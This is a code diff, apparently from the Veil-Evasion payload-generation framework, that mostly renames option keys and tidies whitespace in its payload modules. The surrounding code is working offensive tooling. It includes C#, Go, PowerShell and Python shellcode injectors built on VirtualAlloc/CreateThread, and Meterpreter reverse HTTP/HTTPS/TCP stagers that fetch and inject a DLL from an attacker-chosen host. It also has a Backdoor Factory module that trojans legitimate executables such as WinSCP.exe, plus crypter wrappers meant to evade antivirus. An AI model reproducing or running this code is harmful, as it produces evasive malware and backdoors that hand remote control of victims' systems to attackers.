@@ -54,7 +56,7 @@ class Payload:
         dictionaryName = helpers.randomString()
 
 
-        payloadCode = "using System; using System.Net; using System.Text; using System.Linq; using System.Net.Sockets;" 
+        payloadCode = "using System; using System.Net; using System.Text; using System.Linq; using System.Net.Sockets;"
         payloadCode += "using System.Collections.Generic; using System.Runtime.InteropServices;\n"
 
         payloadCode += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (namespaceName, className, decodeFuncName)
@@ -93,8 +95,8 @@ class Payload:
         # payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
         payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
 
-        if self.required_options["use_arya"][0].lower() == "y":
+        if self.required_options["USE_ARYA"][0].lower() == "y":
             payloadCode = encryption.arya(payloadCode)
-            
+
         return payloadCode
 

--- a/modules/payloads/cs/shellcode_inject/virtual.py
+++ b/modules/payloads/cs/shellcode_inject/virtual.py
@@ -3,7 +3,7 @@
 C# inline shellcode injector using the VirtualAlloc()/CreateThread() pattern.
 Uses basic variable renaming obfuscation.
 
-Adapated from code from: 
+Adapated from code from:
     http://webstersprodigy.net/2012/08/31/av-evading-meterpreter-shell-from-a-net-service/
 
 Module built by @harmj0y
@@ -15,7 +15,7 @@ from modules.common import helpers
 from modules.common import encryption
 
 class Payload:
-    
+
     def __init__(self):
         # required
         self.language = "cs"
@@ -24,13 +24,15 @@ class Payload:
         self.description = "C# VirtualAlloc method for inline shellcode injection"
 
         self.shellcode = shellcode.Shellcode()
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe"   : ["Y", "Compile to an executable"],
-                                 "use_arya"         : ["N", "Use the Arya crypter"]}
+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_ARYA"       : ["N", "Use the Arya crypter"]
+                                }
 
 
     def generate(self):
-        
+
         Shellcode = self.shellcode.generate()
         Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
 
@@ -50,7 +52,7 @@ class Payload:
         payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
         payloadCode += "namespace %s { class %s  { static void Main() {\n" % (namespaceName, className)
         payloadCode += "byte[] %s = {%s};" % (bytearrayName,Shellcode)
-        
+
         payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
         payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
         payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
@@ -59,8 +61,8 @@ class Payload:
         # payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
         payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
 
-        if self.required_options["use_arya"][0].lower() == "y":
+        if self.required_options["USE_ARYA"][0].lower() == "y":
             payloadCode = encryption.arya(payloadCode)
-            
+
         return payloadCode
 

--- a/modules/payloads/go/meterpreter/rev_http.py
+++ b/modules/payloads/go/meterpreter/rev_http.py
@@ -22,9 +22,11 @@ class Payload:
         self.rating = "Normal"
 
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["", "Port of the metasploit handler"],
-                                    "compile_to_exe" : ["Y", "Compile to an executable"]}
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["80", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
     def generate(self):
         memCommit = helpers.randomString()
         memReserve = helpers.randomString()

--- a/modules/payloads/go/meterpreter/rev_https.py
+++ b/modules/payloads/go/meterpreter/rev_https.py
@@ -22,9 +22,11 @@ class Payload:
         self.rating = "Normal"
 
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["", "Port of the metasploit handler"],
-                                    "compile_to_exe" : ["Y", "Compile to an executable"]}
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["8443", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
     def generate(self):
         memCommit = helpers.randomString()
         memReserve = helpers.randomString()

--- a/modules/payloads/go/meterpreter/rev_tcp.py
+++ b/modules/payloads/go/meterpreter/rev_tcp.py
@@ -21,9 +21,11 @@ class Payload:
         self.rating = "Normal"
 
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["", "Port of the metasploit handler"],
-                                    "compile_to_exe" : ["Y", "Compile to an executable"]}
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["4444", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
     def generate(self):
         memCommit = helpers.randomString()
         memReserve = helpers.randomString()

--- a/modules/payloads/go/shellcode_inject/virtual.py
+++ b/modules/payloads/go/shellcode_inject/virtual.py
@@ -19,7 +19,9 @@ class Payload:
         self.extension = "go"
         self.rating = "Normal"
         self.description = "Go VirtualAlloc method for inline shellcode injection"
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
 
         self.shellcode = shellcode.Shellcode()
 
@@ -35,7 +37,7 @@ class Payload:
         size = helpers.randomString()
         addr = helpers.randomString()
         err = helpers.randomString()
-        sc = helpers.randomString() 
+        sc = helpers.randomString()
         buff = helpers.randomString()
         value = helpers.randomString()
 

--- a/modules/payloads/native/backdoor_factory.py
+++ b/modules/payloads/native/backdoor_factory.py
@@ -31,18 +31,18 @@ class Payload:
         self.type = ""
         self.shellcode = shellcode.Shellcode()
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"orig_exe"    : ["WinSCP.exe", "PE or ELF executable to run through the Backdoor Factory"],
-                                 "payload"     : ["reverse_tcp_stager_threaded", "PE or ELF: meter_tcp, rev_shell, custom | PE only meter_https"],
-                                 "LHOST"       : ["127.0.0.1", "IP of the metasploit handler"],
-                                 "LPORT"       : ["4444", "Port of the metasploit handler"],
-                                 "PATCH_METHOD": ["Automatic", "Either Manual or Automatic. For use with \
-                                 payloads that have *_threaded in the name"]
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "ORIGINAL_EXE" : ["WinSCP.exe", "PE or ELF executable to run through the Backdoor Factory"],
+                                    "PAYLOAD"      : ["reverse_tcp_stager_threaded", "PE or ELF: meter_tcp, rev_shell, custom | PE only meter_https"],
+                                    "LHOST"        : ["127.0.0.1", "IP of the Metasploit handler"],
+                                    "LPORT"        : ["4444", "Port of the Metasploit handler"],
+                                    "PATCH_METHOD" : ["Automatic", "Either Manual or Automatic. For use with payloads that have *_threaded in the name"]
                                  }
 
     def basicDiscovery(self):
         try:
-            testBinary = open(self.required_options["orig_exe"][0], 'rb')
+            testBinary = open(self.required_options["ORIGINAL_EXE"][0], 'rb')
         except:
             self.type = ""
             return
@@ -60,13 +60,13 @@ class Payload:
 
     def generate(self):
         #Because of calling BDF via classes, absolute paths change
-        if self.required_options["orig_exe"][0] == "WinSCP.exe":
-            self.required_options["orig_exe"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"
+        if self.required_options["ORIGINAL_EXE"][0] == "WinSCP.exe":
+            self.required_options["ORIGINAL_EXE"][0] = settings.VEIL_EVASION_PATH + "testbins/WinSCP.exe"
 
         #Make sure the bin is supported
         self.basicDiscovery()
 
-        if self.required_options["payload"][0] == "custom":
+        if self.required_options['PAYLOAD'][0] == "custom":
 
             Shellcode = self.shellcode.generate()
 
@@ -77,12 +77,12 @@ class Payload:
             print "shellcode", settings.TEMP_DIR + "shellcode.raw"
             #invoke the class for the associated binary
             if self.type == 'PE':
-                targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',
+                targetFile = pebin.pebin(FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe',
                                          SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw",
                                          PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
                 self.extension = "exe"
             elif self.type == 'ELF':
-                targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
+                targetFile = elfbin.elfbin(FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe', SHELL='user_supplied_shellcode', SUPPLIED_SHELLCODE=settings.TEMP_DIR + "shellcode.raw")
                 self.extension = ""
             else:
                 print "\nInvalid File or File Type Submitted, try again.\n"
@@ -90,17 +90,17 @@ class Payload:
 
         else:
 
-            shellcodeChoice = self.required_options['payload'][0]
+            shellcodeChoice = self.required_options['PAYLOAD'][0]
 
             # invoke the class for the associated binary
             if self.type == 'PE':
-                targetFile = pebin.pebin(FILE=self.required_options["orig_exe"][0], OUTPUT='payload.exe',
+                targetFile = pebin.pebin(FILE=self.required_options["ORIGINAL_EXE"][0], OUTPUT='payload.exe',
                                          SHELL=shellcodeChoice, HOST=self.required_options["LHOST"][0],
                                          PORT=int(self.required_options["LPORT"][0]),
                                          PATCH_METHOD=self.required_options["PATCH_METHOD"][0])
                 self.extension = "exe"
             elif self.type == 'ELF':
-                targetFile = elfbin.elfbin(FILE=self.required_options["orig_exe"][0],
+                targetFile = elfbin.elfbin(FILE=self.required_options["ORIGINAL_EXE"][0],
                                            OUTPUT='payload.exe', SHELL=shellcodeChoice,
                                            HOST=self.required_options["LHOST"][0],
                                            PORT=int(self.required_options["LPORT"][0]))

--- a/modules/payloads/native/hyperion.py
+++ b/modules/payloads/native/hyperion.py
@@ -14,7 +14,7 @@ from modules.common import helpers
 import settings
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Automates the running of the Hyperion crypter on an existing .exe"
@@ -22,24 +22,26 @@ class Payload:
         self.rating = "Normal"
         self.extension = "exe"
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"original_exe" : ["", "The executable to run Hyperion on"]}
-        
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "ORIGINAL_EXE" : ["", "The executable to run Hyperion on"]
+                                }
+
     def generate(self):
-        
+
         # randomize the output file so we don't overwrite anything
         randName = helpers.randomString(5) + ".exe"
         outputFile = settings.TEMP_DIR + randName
-        
+
         # the command to invoke hyperion. TODO: windows compatibility
-        hyperionCommand = "wine hyperion.exe " + self.required_options["original_exe"][0] + " " + outputFile
-        
-        print helpers.color("\n[*] Running Hyperion on " + self.required_options["original_exe"][0] + "...")
-        
+        hyperionCommand = "wine hyperion.exe " + self.required_options["ORIGINAL_EXE"][0] + " " + outputFile
+
+        print helpers.color("\n[*] Running Hyperion on " + self.required_options["ORIGINAL_EXE"][0] + "...")
+
         # be sure to set 'cwd' to the proper directory for hyperion so it properly runs
         p = subprocess.Popen(hyperionCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_EVASION_PATH+"tools/hyperion/", shell=True)
         stdout, stderr = p.communicate()
-        
+
         try:
             # read in the output .exe from /tmp/
             f = open(outputFile, 'rb')
@@ -49,7 +51,7 @@ class Payload:
             print "\nError during Hyperion execution:\n" + helpers.color(stdout, warning=True)
             raw_input("\n[>] Press any key to return to the main menu:")
             return ""
-        
+
         # cleanup the temporary output file. TODO: windows compatibility
         p = subprocess.Popen("rm " + outputFile, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
         stdout, stderr = p.communicate()

--- a/modules/payloads/native/pe_scrambler.py
+++ b/modules/payloads/native/pe_scrambler.py
@@ -14,7 +14,7 @@ from modules.common import helpers
 import settings
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "Automates the running of the PEScrambler crypter on an existing .exe"
@@ -22,25 +22,27 @@ class Payload:
         self.rating = "Normal"
         self.extension = "exe"
 
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"original_exe" : ["", "The executable to run PEScrambler on"]}
-        
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "ORIGINAL_EXE" : ["", "The executable to run PEScrambler on"]
+                                }
+
     def generate(self):
-        
+
         # randomize the output file so we don't overwrite anything
         randName = helpers.randomString(5) + ".exe"
         outputFile = settings.TEMP_DIR + randName
-        
-        # the command to invoke hyperion. TODO: windows compatibility
-        peCommand = "wine PEScrambler.exe -i " + self.required_options["original_exe"][0] + " -o " + outputFile
 
-        print helpers.color("\n[*] Running PEScrambler on " + self.required_options["original_exe"][0] + "...")
-        
+        # the command to invoke hyperion. TODO: windows compatibility
+        peCommand = "wine PEScrambler.exe -i " + self.required_options["ORIGINAL_EXE"][0] + " -o " + outputFile
+
+        print helpers.color("\n[*] Running PEScrambler on " + self.required_options["ORIGINAL_EXE"][0] + "...")
+
         # be sure to set 'cwd' to the proper directory for hyperion so it properly runs
         p = subprocess.Popen(peCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=settings.VEIL_EVASION_PATH+"tools/pescrambler/", shell=True)
         time.sleep(3)
         stdout, stderr = p.communicate()
-        
+
         try:
             # read in the output .exe from /tmp/
             f = open(outputFile, 'rb')
@@ -50,7 +52,7 @@ class Payload:
             print "\nError during PEScrambler execution:\n" + helpers.color(stdout, warning=True)
             raw_input("\n[>] Press any key to return to the main menu:")
             return ""
-        
+
         # cleanup the temporary output file. TODO: windows compatibility
         p = subprocess.Popen("rm " + outputFile, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
         stdout, stderr = p.communicate()

--- a/modules/payloads/powershell/meterpreter/rev_http.py
+++ b/modules/payloads/powershell/meterpreter/rev_http.py
@@ -10,23 +10,23 @@ from modules.common import helpers
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
         self.rating = "Excellent"
         self.language = "powershell"
         self.extension = "bat"
-        
+
         # optional
-        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["8080", "Port of the metasploit handler"],
+        self.required_options = {   "LHOST" : ["", "IP of the Metasploit handler"],
+                                    "LPORT" : ["8080", "Port of the Metasploit handler"],
                                     "PROXY" : ["N", "Use system proxy settings"]
                                 }
 
-    
+
     def generate(self):
-       
+
         proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
         baseString = """$q = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

--- a/modules/payloads/powershell/meterpreter/rev_https.py
+++ b/modules/payloads/powershell/meterpreter/rev_https.py
@@ -10,23 +10,23 @@ from modules.common import helpers
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
         self.rating = "Excellent"
         self.language = "powershell"
         self.extension = "bat"
-        
+
         # optional
-        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["8443", "Port of the metasploit handler"],
+        self.required_options = {   "LHOST" : ["", "IP of the Metasploit handler"],
+                                    "LPORT" : ["8443", "Port of the Metasploit handler"],
                                     "PROXY" : ["N", "Use system proxy settings"]
                                 }
 
-    
+
     def generate(self):
-        
+
         proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
         baseString = """$q = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

--- a/modules/payloads/powershell/meterpreter/rev_tcp.py
+++ b/modules/payloads/powershell/meterpreter/rev_tcp.py
@@ -10,21 +10,22 @@ from modules.common import helpers
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
         self.rating = "Excellent"
         self.language = "powershell"
         self.extension = "bat"
-        
-        # optional
-        self.required_options = {   "LHOST" : ["", "IP of the metasploit handler"],
-                                    "LPORT" : ["4444", "Port of the metasploit handler"]}
 
-    
+        # optional
+        self.required_options = {   "LHOST" : ["", "IP of the Metasploit handler"],
+                                    "LPORT" : ["4444", "Port of the Metasploit handler"]
+                                }
+
+
     def generate(self):
-        
+
         baseString = """$c = @"
 [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
 [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);

--- a/modules/payloads/python/meterpreter/rev_http_contained.py
+++ b/modules/payloads/python/meterpreter/rev_http_contained.py
@@ -1,8 +1,8 @@
 """
 
-Reads in metsrv.dll, patches it with appropriate options for a 
-meterpreter reverse_http payload compresses/bas64 encodes it 
-and then builds a python injection wrapper to inject the contained 
+Reads in metsrv.dll, patches it with appropriate options for a
+meterpreter reverse_http payload compresses/bas64 encodes it
+and then builds a python injection wrapper to inject the contained
 meterpreter dll into memory.
 
 Concept and module by @harmj0y
@@ -19,22 +19,24 @@ import settings
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "self-contained windows/meterpreter/reverse_http stager, no shellcode"
         self.language = "python"
         self.rating = "Excellent"
         self.extension = "py"
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["virtual", "[virtual]alloc or [void]pointer"],
-                                 "LHOST" : ["", "IP of the metasploit handler"],
-                                 "LPORT" : ["80", "Port of the metasploit handler"]}
 
-                    
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["virtual", "[virtual]alloc or [void]pointer"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["80", "Port of the Metasploit handler"]
+                                }
+
+
     def generate(self):
 
         # get the main meterpreter .dll with the header/loader patched
@@ -46,18 +48,18 @@ class Payload:
         # replace the URL
         urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
         meterpreterDll = patch.patchURL(meterpreterDll, urlString)
-        
+
         # replace in the UA
         meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
 
         # compress/base64 encode the dll
         compressedDll = helpers.deflate(meterpreterDll)
-        
+
         # actually build out the payload
         payloadCode = ""
-        
+
         # traditional void pointer injection
-        if self.required_options["inject_method"][0].lower() == "void":
+        if self.required_options["INJECT_METHOD"][0].lower() == "void":
 
             # doing void * cast
             payloadCode += "from ctypes import *\nimport base64,zlib\n"
@@ -73,7 +75,7 @@ class Payload:
 
             randVarName = helpers.randomString()
             randFuncName = helpers.randomString()
-            
+
             payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
             payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
             payloadCode += randFuncName+"()\n"
@@ -102,8 +104,8 @@ class Payload:
             payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
             payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
 
-        
-        if self.required_options["use_pyherion"][0].lower() == "y":
+
+        if self.required_options["USE_PYHERION"][0].lower() == "y":
             payloadCode = encryption.pyherion(payloadCode)
 
         return payloadCode

--- a/modules/payloads/python/meterpreter/rev_https.py
+++ b/modules/payloads/python/meterpreter/rev_https.py
@@ -10,22 +10,24 @@ from modules.common import helpers
 from modules.common import encryption
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
         self.language = "python"
         self.rating = "Excellent"
         self.extension = "py"
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe"   : ["Y", "Compile to an executable"],
-                                 "use_pyherion"    : ["N", "Use the python encrypter"],
-                                 "LHOST"            : ["", "IP of the metasploit handler"],
-                                 "LPORT"            : ["8443", "Port of the metasploit handler"]}
-        
+
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["8443", "Port of the Metasploit handler"]
+                                }
+
     def generate(self):
-    
+
         payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
 
         # randomize everything, yo'
@@ -54,14 +56,14 @@ class Payload:
 
         # helper method that returns the sum of all ord values in a string % 0x100
         payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
-        
+
         # method that generates a new checksum value for checkin to the meterpreter handler
         payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
         payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
         payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
         payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
         payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
-        
+
         # method that connects to a host/port over https and downloads the hosted data
         payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
         payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
@@ -85,13 +87,13 @@ class Payload:
         payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
         payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
         payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
-        
+
         # download the metpreter .dll and inject it
         payloadCode += "%s = ''\n" %(data2Name)
         payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
         payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
 
-        if self.required_options["use_pyherion"][0].lower() == "y":
+        if self.required_options["USE_PYHERION"][0].lower() == "y":
             payloadCode = encryption.pyherion(payloadCode)
 
         return payloadCode

--- a/modules/payloads/python/meterpreter/rev_https_contained.py
+++ b/modules/payloads/python/meterpreter/rev_https_contained.py
@@ -1,8 +1,8 @@
 """
 
-Reads in metsrv.dll, patches it with appropriate options for a 
-meterpreter reverse_https payload compresses/bas64 encodes it 
-and then builds a python injection wrapper to inject the contained 
+Reads in metsrv.dll, patches it with appropriate options for a
+meterpreter reverse_https payload compresses/bas64 encodes it
+and then builds a python injection wrapper to inject the contained
 meterpreter dll into memory.
 
 Concept and module by @harmj0y
@@ -19,24 +19,26 @@ import settings
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "self-contained windows/meterpreter/reverse_https stager, no shellcode"
         self.language = "python"
         self.rating = "Excellent"
         self.extension = "py"
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["virtual", "[virtual]alloc or [void]pointer"],
-                                 "LHOST" : ["", "IP of the metasploit handler"],
-                                 "LPORT" : ["443", "Port of the metasploit handler"]}
 
-                    
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["virtual", "[virtual]alloc or [void]pointer"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["443", "Port of the Metasploit handler"]
+                                }
+
+
     def generate(self):
-        
+
         # get the main meterpreter .dll with the header/loader patched
         meterpreterDll = patch.headerPatch()
 
@@ -46,18 +48,18 @@ class Payload:
         # replace the URL
         urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
         meterpreterDll = patch.patchURL(meterpreterDll, urlString)
-        
+
         # replace in the UA
         meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
 
         # compress/base64 encode the dll
         compressedDll = helpers.deflate(meterpreterDll)
-        
+
         # actually build out the payload
         payloadCode = ""
-        
+
         # traditional void pointer injection
-        if self.required_options["inject_method"][0].lower() == "void":
+        if self.required_options["INJECT_METHOD"][0].lower() == "void":
 
             # doing void * cast
             payloadCode += "from ctypes import *\nimport base64,zlib\n"
@@ -73,7 +75,7 @@ class Payload:
 
             randVarName = helpers.randomString()
             randFuncName = helpers.randomString()
-            
+
             payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
             payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
             payloadCode += randFuncName+"()\n"
@@ -102,8 +104,8 @@ class Payload:
             payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
             payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
 
-        
-        if self.required_options["use_pyherion"][0].lower() == "y":
+
+        if self.required_options["USE_PYHERION"][0].lower() == "y":
             payloadCode = encryption.pyherion(payloadCode)
 
         return payloadCode

--- a/modules/payloads/python/shellcode_inject/aes_encrypt.py
+++ b/modules/payloads/python/shellcode_inject/aes_encrypt.py
@@ -24,30 +24,32 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "AES Encrypted shellcode is decrypted at runtime with key in file, injected into memory, and executed"
         self.language = "python"
         self.extension = "py"
         self.rating = "Excellent"
-        
+
         self.shellcode = shellcode.Shellcode()
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Void, Heap"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
-        
-        
+
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Void, Heap"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                }
+
+
     def generate(self):
-        if self.required_options["inject_method"][0].lower() == "virtual":
-            if self.required_options["expire_payload"][0].lower() == "x":
-                
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
